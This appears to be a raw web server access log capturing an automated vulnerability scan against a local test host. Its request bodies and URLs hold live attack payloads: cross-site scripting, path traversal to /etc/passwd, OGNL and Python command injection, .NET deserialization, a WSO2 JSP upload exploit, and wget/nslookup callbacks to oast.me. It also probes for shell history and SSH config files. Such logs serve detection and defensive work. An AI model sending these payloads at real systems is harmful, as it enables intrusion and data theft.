"18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /zabbix/index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /user.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.038","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/.well-known/openid-configuration HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"content1=&button=%E6%8F%90%E4%BA%A4%E5%86%85%E5%AE%B9","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /php/demo.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca27l3osmpvb3nig07h016qiebkx4uc79.oast.me%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth/change HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /api/geojson?url=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /actuator/jolokia/list HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/ui/index HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.sh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web_shell_cmd.gch HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /www/delivery/afr.php?refresh=10000&\x22)',10000000);alert(1337);setTimeout('alert(\x22 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /web/xml/webuser-auth.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /graph_realtime.php?action=init HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/common/login/webLogin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index_sso.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.circleci/ssh-config HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=probes HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /hui/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action?SpaceKey=x HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"username=root&password=123%22%2C%22%246%24%24%22%29%29%3Bimport+os%3Bos.system%28%22wget+http%3A%2F%2Fca27l3osmpvb3nig07h06kuwa671ayb58.oast.me%22%29%3Bprint%28crypt.crypt%28%22","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /auth HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webadmin/out HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/admin/service_manager_data.php", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bolt/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /service/v1/service-details HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /console HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/email-subscribers HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rewe/prod/web/rewe_go_check.php?config=rewe&version=7.5.0%3cscript%3econfirm(29K6BUsLzMtCGQyCEy6ZRMznzH0)%3c%2fscript%3e&win=2707 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /swagger/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.zsh_history HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-----------------------------250033711231076532771336998311\x0D\x0AContent-Disposition: form-data; name=\x22../../../../repository/deployment/server/webapps/authenticationendpoint/29k6bzcbunkpdd9v6ihoqhjwuou.jsp\x22;filename=\x22test.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<% out.print(\x22WSO2-RCE-CVE-2022-29464\x22); %>\x0D\x0A-----------------------------250033711231076532771336998311--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /fileupload/toolsAny HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.build.sh HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /dns-query?dns=q80BAAABAAAAAAAAA3d3dwdleGFtcGxlA2NvbQAAAQAB HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /otobo/index.pl HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /PRESENTATION/EPSONCONNECT HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"\x0D\x0A\x0D\x0A \x0D\x0A foo\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A <_comparison z:Id=\x224\x22 z:FactoryType=\x22a:DelegateSerializationHolder\x22 z:Type=\x22System.DelegateSerializationHolder\x22 z:Assembly=\x220\x22\x0D\x0A xmlns=\x22http://schemas.datacontract.org/2004/07/System.Collections.Generic\x22\x0D\x0A xmlns:a=\x22http://schemas.datacontract.org/2004/07/System\x22>\x0D\x0A \x0D\x0A mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Compare\x0D\x0A \x0D\x0A \x0D\x0A System.String\x0D\x0A System.Comparison`1[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A Start\x0D\x0A \x0D\x0A System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089\x0D\x0A System.Diagnostics.Process\x0D\x0A System.Func`3[[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.String, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A System.Diagnostics.Process Start(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A Int32 Compare(System.String, System.String)\x0D\x0A System.Int32 Compare(System.String, System.String)\x0D\x0A 8\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A 2\x0D\x0A \x0D\x0A /c nslookup ca27l3osmpvb3nig07h06x1eiymqdzubk.oast.me\x0D\x0A cmd\x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A \x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /sitecore/shell/ClientBin/Reporting/Report.ashx HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"{\x22dashboard\x22:{\x22annotations\x22:{\x22list\x22:[{\x22name\x22:\x22Annotations & Alerts\x22,\x22enable\x22:true,\x22iconColor\x22:\x22rgba(0, 211, 255, 1)\x22,\x22type\x22:\x22dashboard\x22,\x22builtIn\x22:1,\x22hide\x22:true}]},\x22editable\x22:true,\x22gnetId\x22:null,\x22graphTooltip\x22:0,\x22id\x22:null,\x22links\x22:[],\x22panels\x22:[],\x22schemaVersion\x22:18,\x22snapshot\x22:{\x22originalUrl\x22:\x22javascript:alert('Revers3c')\x22,\x22timestamp\x22:\x222020-03-30T01:24:44.529Z\x22},\x22style\x22:\x22dark\x22,\x22tags\x22:[],\x22templating\x22:{\x22list\x22:[]},\x22time\x22:{\x22from\x22:null,\x22to\x22:\x222020-03-30T01:24:53.549Z\x22,\x22raw\x22:{\x22from\x22:\x226h\x22,\x22to\x22:\x22now\x22}},\x22timepicker\x22:{\x22refresh_intervals\x22:[\x225s\x22,\x2210s\x22,\x2230s\x22,\x221m\x22,\x225m\x22,\x2215m\x22,\x2230m\x22,\x221h\x22,\x222h\x22,\x221d\x22],\x22time_options\x22:[\x225m\x22,\x2215m\x22,\x221h\x22,\x226h\x22,\x2212h\x22,\x2224h\x22,\x222d\x22,\x227d\x22,\x2230d\x22]},\x22timezone\x22:\x22\x22,\x22title\x22:\x22Dashboard\x22,\x22uid\x22:null,\x22version\x22:0},\x22name\x22:\x22Dashboard\x22,\x22expires\x22:0}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/snapshots HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /public/login.htm?type=requests HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/apcupsd/multimon.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"queryString=aaaa\x5Cu0027%2b#{16*8787}%2b\x5Cu0027bbb","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /confluence/pages/createpage-entervariables.action HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ws2020/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:29 